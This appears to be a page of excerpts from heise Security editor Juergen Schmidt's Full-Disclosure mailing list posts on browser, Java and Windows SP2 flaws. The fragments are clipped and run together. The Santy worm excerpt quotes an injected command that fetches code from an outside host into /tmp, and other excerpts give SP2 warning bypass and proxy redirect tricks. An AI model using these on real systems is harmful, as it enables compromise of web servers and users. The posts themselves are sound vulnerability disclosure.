[Full-Disclosure] Re: New Santy-Worm attacks *all* PHP-skripts

On Sat, 25 Dec 2004, Pekka Savola wrote: On Sat, 25 Dec 2004, Juergen Schmidt wrote: It uses the brasilian Google site to find all kinds of PHP skripts. It parses their URLs and overwrites variables with strings like: 'http://www.visualcoders.net/spy.gif?cmd=cd /tmp;wget

Re: [Full-Disclosure] [Advisory] Mozilla Products Remote Crash Vulnerability

not getting a response, published the information he gathered. What should he (or your mother) do, if mozilla is crashing on a particular web site? Shut up? Learn how to write a buffer overflow exploit before reporting it? bye, ju -- Juergen Schmidt Chefredakteur heise Security

Re: [Full-Disclosure] Disclosure of local file content in Mozilla Firefox and Opera

) under Linux -- but this may have been configured by me a long time ago. On Windows, I can have the default opener set to my browser by adding: Content-Disposition: attachment; filename=cttest.html (the .html is important). bye, ju -- Juergen Schmidt Chefredakteur heise Security

Re: [Full-Disclosure] Sun Java Plugin arbitrary package access vulnerability

this with Debian (unstable, j2re1.4) which uses a Java 1.4.1 from Blackdown. It does not work. Does this mean Blackdowns Java is not vulnerable? Or is testing for sun.text.Utility not adequate for this. The class sun.text.Utility is present in rt.jar. bye, ju -- Juergen Schmidt Chefredakteur heise

[Full-Disclosure] Flaws in SP2 security features, part II

Date: 16.11.2005 Author: Juergen Schmidt, heise Security Original article: http://www.heise.de/security/artikel/53297 German version: http://www.heise.de/security/news/meldung/53306 Flaws in SP2 security features, part II With Service Pack 2 Microsoft introduced a couple of new security features

[Full-Disclosure] Re: [Unpatched] New 0day exploit for XPSP2

= `malwarez' 1 HTTP/1.0 200 OK ... 8 Content-Type: text/html So IE just uses the Content-Type to name this file. bye, ju -- Juergen SchmidtChefredakteur heise Security www.heisec.de Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover Tel. +49 511

[Full-Disclosure] Flaws in the new security functions of SP2 - revisited

. If the downloaded archive evil.zip contains evil1.exe (attrib -R) and evil2.exe (attrib +R) and you extract them with the Wizard into the folder evil, opening evil1 gives you a warning, opening evil2 not. bye, ju -- Juergen SchmidtChefredakteur heise Security www.heisec.de Heise Zeitschriften Verlag

[Full-Disclosure] Flaws security feature of SP2

personal thoughts about this response in the latest comment on heise Security: Microsoft: A matter of trust, http://www.heise.de/security/artikel/50054 -- Juergen SchmidtChefredakteur heise Security www.heisec.de Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover Tel. +49 511 5352

Re: [Full-Disclosure] FOUND: COELACANTH: Phreak Phishing Expedition

not evaluate the redirection but passes the whole URL to the proxy: GET http://www.heise.de%2F%20%20redir=.e-gold.com/ HTTP/1.0 bye, ju -- Juergen SchmidtChefredakteur heise Security www.heisec.de Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover Tel. +49 511 5352 300 FAX

[Full-Disclosure] Re: Fwd: Computers crashed just before blackout

come to a different conclusion, once thing is certain: The IT systems of the energy utility companies are vulnerable. http://www.heise.de/ct/english/03/18/034/ bye, ju -- Juergen Schmidt Leitender Redakteur/senior editor c't magazin Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625